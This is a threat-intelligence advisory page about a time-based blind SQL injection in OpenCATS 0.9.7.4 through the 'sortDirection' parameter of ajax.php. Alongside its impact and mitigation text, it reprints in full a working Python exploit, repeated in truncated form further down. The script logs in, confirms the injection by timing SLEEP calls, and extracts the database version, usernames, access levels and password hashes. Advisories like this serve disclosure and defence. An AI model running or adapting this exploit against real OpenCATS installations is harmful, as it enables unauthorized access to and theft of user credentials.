OpenCATS 0.9.7.4 - SQL Injection
OpenCATS version 0. 9. 7. 4 and earlier contains a SQL injection vulnerability. The vulnerability allows an attacker to perform blind SQL injection via a parameter in an AJAX request, enabling extraction of database information including user credentials. Exploit code is publicly available in Python, demonstrating the ability to enumerate database version, current database, and user table contents. No official patch or vendor advisory is currently provided. The vulnerability affects deployments on typical LAMP stack environments such as Ubuntu 22. 04 with Apache2, PHP, and MariaDB 10. 6.
AI Analysis
Technical Summary
OpenCATS versions up to 0.9.7.4 are vulnerable to a blind SQL injection attack through the 'sortDirection' parameter in an AJAX request to 'ajax.php'. The exploit leverages time-based SQL injection techniques to infer database content by measuring response delays. The provided Python exploit script automates this process to extract database version, current database name, and user credentials including usernames, access levels, and password hashes. The vulnerability was discovered and demonstrated by Gabriel Rodrigues (TEXUGO) from HAKAI. No CVE identifier is assigned, but a GitHub Security Advisory ID (GHSA-8mc8-5gw6-c7w4) is referenced. There is no indication of known exploits in the wild or an official patch release from the vendor as of the published date.
Potential Impact
Successful exploitation allows an attacker to extract sensitive database information including user credentials, potentially leading to unauthorized access and further compromise of the affected OpenCATS installation. The vulnerability impacts the confidentiality and integrity of the data stored in the application database. There is no evidence of active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is released, users should consider restricting access to the vulnerable endpoints, applying web application firewall rules to detect and block SQL injection attempts, or upgrading to a later, unaffected version if available. Monitor the vendor's official channels for updates regarding patches or mitigations.
Indicators of Compromise
- exploit-code: # Exploit Title: OpenCATS 0.9.7.4 - SQL Injection # Exploit Author: Gabriel Rodrigues (TEXUGO) from HAKAI # Vendor Homepage: https://www.opencats.org # Software Link: https://github.com/opencats/OpenCATS # Version: <= 0.9.7.4 # Tested on: Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6 # CVE: N/A (GHSA-8mc8-5gw6-c7w4) import requests, json, sys, time url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8888" user = sys.argv[2] if len(sys.argv) > 2 else "admin" pw = sys.argv[3] if len(sys.argv) > 3 else "cats" delay = 1.5 s = requests.Session() s.get(f"{url}/index.php") s.post(f"{url}/index.php?m=login&a=attemptLogin", data={"username": user, "password": pw}, allow_redirects=True) def sqli(payload): t = time.time() s.get(f"{url}/ajax.php", timeout=30, params={"f": "getDataGridPager", "i": "candidates:candidatesListByViewDataGrid", "p": json.dumps({"sortBy": "dateModifiedSort", "sortDirection": payload, "rangeStart": 0, "maxResults": 15})}) return time.time() - t def blind(cond): return sqli(f"DESC,IF(({cond}),SLEEP({delay}),0)") > delay * 0.6 def extract(query, maxlen=100): out = "" for i in range(1, maxlen + 1): if blind(f"LENGTH({query})<{i}"): break lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 lo, hi = (mid + 1, hi) if blind(f"ORD(SUBSTRING({query},{i},1))>{mid}") else (lo, mid) out += chr(lo) return out base = sqli("DESC") slp = sqli("DESC,SLEEP(2)") print(f"baseline={base:.2f}s sleep(2)={slp:.2f}s") assert slp > base + 1, "not vulnerable or no candidate rows" print("injection confirmed\n") print("version:", extract("@@version", 30)) print("database:", extract("DATABASE()", 20)) n = int(extract("(SELECT COUNT(*) FROM user)", 3)) print(f"users: {n}\n") for i in range(n): name = extract(f"(SELECT user_name FROM user ORDER BY user_id LIMIT {i},1)", 40) level = extract(f"(SELECT access_level FROM user ORDER BY user_id LIMIT {i},1)", 5) hash_ = extract(f"(SELECT password FROM user ORDER BY user_id LIMIT {i},1)", 62) print(f" {name} level={level} hash={hash_}")
OpenCATS 0.9.7.4 - SQL Injection
Description
OpenCATS version 0. 9. 7. 4 and earlier contains a SQL injection vulnerability. The vulnerability allows an attacker to perform blind SQL injection via a parameter in an AJAX request, enabling extraction of database information including user credentials. Exploit code is publicly available in Python, demonstrating the ability to enumerate database version, current database, and user table contents. No official patch or vendor advisory is currently provided. The vulnerability affects deployments on typical LAMP stack environments such as Ubuntu 22. 04 with Apache2, PHP, and MariaDB 10. 6.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
OpenCATS versions up to 0.9.7.4 are vulnerable to a blind SQL injection attack through the 'sortDirection' parameter in an AJAX request to 'ajax.php'. The exploit leverages time-based SQL injection techniques to infer database content by measuring response delays. The provided Python exploit script automates this process to extract database version, current database name, and user credentials including usernames, access levels, and password hashes. The vulnerability was discovered and demonstrated by Gabriel Rodrigues (TEXUGO) from HAKAI. No CVE identifier is assigned, but a GitHub Security Advisory ID (GHSA-8mc8-5gw6-c7w4) is referenced. There is no indication of known exploits in the wild or an official patch release from the vendor as of the published date.
Potential Impact
Successful exploitation allows an attacker to extract sensitive database information including user credentials, potentially leading to unauthorized access and further compromise of the affected OpenCATS installation. The vulnerability impacts the confidentiality and integrity of the data stored in the application database. There is no evidence of active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is released, users should consider restricting access to the vulnerable endpoints, applying web application firewall rules to detect and block SQL injection attempts, or upgrading to a later, unaffected version if available. Monitor the vendor's official channels for updates regarding patches or mitigations.
Technical Details
- Version
- <= 0.9.7.4
- Vendor
- https://www.opencats.org
- Application
- https://github.com/opencats/OpenCATS
- Author
- Gabriel Rodrigues (TEXUGO) from HAKAI
- Platform
- Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6
- Edb Id
- 52579
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for OpenCATS 0.9.7.4 - SQL Injection
# Exploit Title: OpenCATS 0.9.7.4 - SQL Injection # Exploit Author: Gabriel Rodrigues (TEXUGO) from HAKAI # Vendor Homepage: https://www.opencats.org # Software Link: https://github.com/opencats/OpenCATS # Version: <= 0.9.7.4 # Tested on: Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6 # CVE: N/A (GHSA-8mc8-5gw6-c7w4) import requests, json, sys, time url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8888" user = sys.argv[2] if len(sys.argv) > 2 else "admin" pw = sys.argv[3] if len... (1641 more characters)
Threat ID: 6a1769c5e29bf47b50f43bbe
Added to database: 5/27/2026, 10:01:41 PM
Last enriched: 5/27/2026, 10:02:09 PM
Last updated: 5/27/2026, 11:13:27 PM
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.